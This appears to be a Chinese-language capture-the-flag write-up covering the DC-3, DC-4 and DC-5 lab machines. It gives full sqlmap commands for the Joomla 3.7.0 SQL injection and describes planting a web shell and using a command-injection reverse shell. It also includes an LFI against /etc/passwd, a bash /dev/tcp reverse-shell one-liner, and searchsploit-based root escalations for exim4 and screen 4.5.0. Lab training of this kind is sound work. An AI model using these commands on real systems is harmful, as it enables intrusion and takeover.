总字符数: 6.81K
代码: 920, 文本: 5.89K
预计阅读时间: 14 分钟
DC-3
### arp-scan使用Kali中的[arp](https://so.csdn.net/so/search?q=arp&spm=1001.2101.3001.7020)-scan工具扫描结果如下: ### nmap探测使用[nmap](https://so.csdn.net/so/search?q=nmap&spm=1001.2101.3001.7020)工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口). ### 访问web访问web界面如下: ### 对网站信息收集打开插件Wappalyzer进行网站指纹识别如下: 从指纹识别信息中提取出的信息有: 1 内容管理系统(CMS):Joomla *Joomla**!*是使用PHP语言加上MySQL数据库所开发的软件系统. 2 操作系统:Ubuntu 3 字体脚本:Google Font API 4 Web服务器:Apache 2.4.18 5 编程语言:PHP 6 JavaScript:JQuery 1.12.4 JQuery Migrate 1.4.1 7 用户界面(UI)框架:Bootstrap Kali中的joomscan网站扫描工具就是专门用来扫描此类网站的 `perl joomscan.pl --url `[http://172.16.12.151](http://172.16.12.151/) 其中joomla版本为:3.7.0 后台管理页面为:[http://192.168.164.132/administrator/](http://192.168.164.132/administrator/) ### 用户密码破解搜索漏洞 我们查看这个sql注入的文本文档 写的很详细,包括注入的类型和payload及使用sqlmap暴力注入 直接上sqlmap 暴库 `sqlmap -u "http://192.168.164.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]` 暴表 `sqlmap -u "http://192.168.164.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]` 看到了user相关表 暴字段 `qlmap -u "http://192.168.164.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]` 暴内容 `sqlmap -u "http://192.168.164.132/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C "username,password" --dump -p list[fullordering] ` 破解密码 将密文保存到一个文件中使用john破解,:后面的为密码 用户admin的密码为snoopy 使用admin登录web ### 提权生成木马 访问[Protostar Details and Files](http://192.168.164.132/administrator/index.php?option=com_templates&view=template&id=506&file=aG9tZQ==) 点进去更改index.php的内容,写入木马 保存,使用weevely连接 Find查找有特殊位权限文件`find / -perm -u=s -type f 2>/dev/null` 查看系统内核以及系统版本 只要符合条件的都可以试一下,这里选择39772,下载 记住使用方法,kali去下载这个压缩包 靶机下载 解压zip 进入目录,继续解压exp 反弹shell,weevely有些不好使 更换为全交互终端 `python3 -c 'import pty;pty.spawn("/bin/bash")'` 进入这个目录,运行文件 等待大概1分钟,提权成功 查看flag ## DC-4### 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020. ### 信息收集#### 主机发现 使用Kali中的arp-scan工具扫描结果如下 #### 端口探测探测使用nmap工具 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默认端口) #### 目录扫描dirsearch #### 访问web访问web界面如下 #### 网站信息收集打开插件Wappalyzer进行网站指纹识别如下 从指纹识别信息中提取出的信息有: 1 Web服务器:Nginx 1.15.0 右键点击查看源代码未发现flag字样 从源代码中只能看见用户名/密码的提交方式为POST方式,先尝试一些常见的用户名和密码如admin:admin等登陆失败,用php万能密码登录也是失败. #### 用户密码破解账号密码:admin,happy,没必要爆破,有些人的教程是爆破,很多字典里基本不会有这种词 使用账号密码登录如下 点击Commad出现如下 点击第一个选项点击run出现如下页面 继续用bp抓包看看 看样子我们可以在这里抓包更改执行我们想要执行的命令,直接反弹shell ### exim4提权发现可以使用exim4进行提权操作 查看版本号,版本为4.89 Kali中寻找提权方法 上面中最后选用的是46996.sh脚本,将此文件上传到DC-4上**尽量下载到tmp目录下,记得chmod 777 46996.sh** 开始提权 提权成功,查看flag文件 ## DC-5 ### 渗透过程1. kali扫描局域网:1 | arp-scan -l |
1 | nmap -sS -Pn -p- -v -P4 192.168.138.133 |
1 | wfuzz -z file,/usr/share/wfuzz/wordlist/general/common.txt http://192.168.138.133/thankyou.php?FUZZ=/etc/passwd |
1 | http://192.168.138.133/thankyou.php?file=/etc/passwd |
1 | http://192.168.138.133/thankyou.php?file=/var/log/nginx/access.log |
1 | bash -c 'bash -i >& /dev/tcp/192.168.138.129/7777 0>&1' |
1 | python -c 'import pty;pty.spawn("/bin/bash")' |
1 | find / -perm -u=s -type f 2>/dev/null |
1 | searchsploit screen 4.5.0 |
1 | searchsploit -m 41154.sh |
1 | ./41154.sh |
1 | function onstart(){ |
1 | find / -perm -u=s -type f 2>/dev/null |
1 | # bash -p 开启一个新shell suid的话自然是开启 root shell |
1 | python3 -c 'import pty;pty.spawn("/bin/bash")' |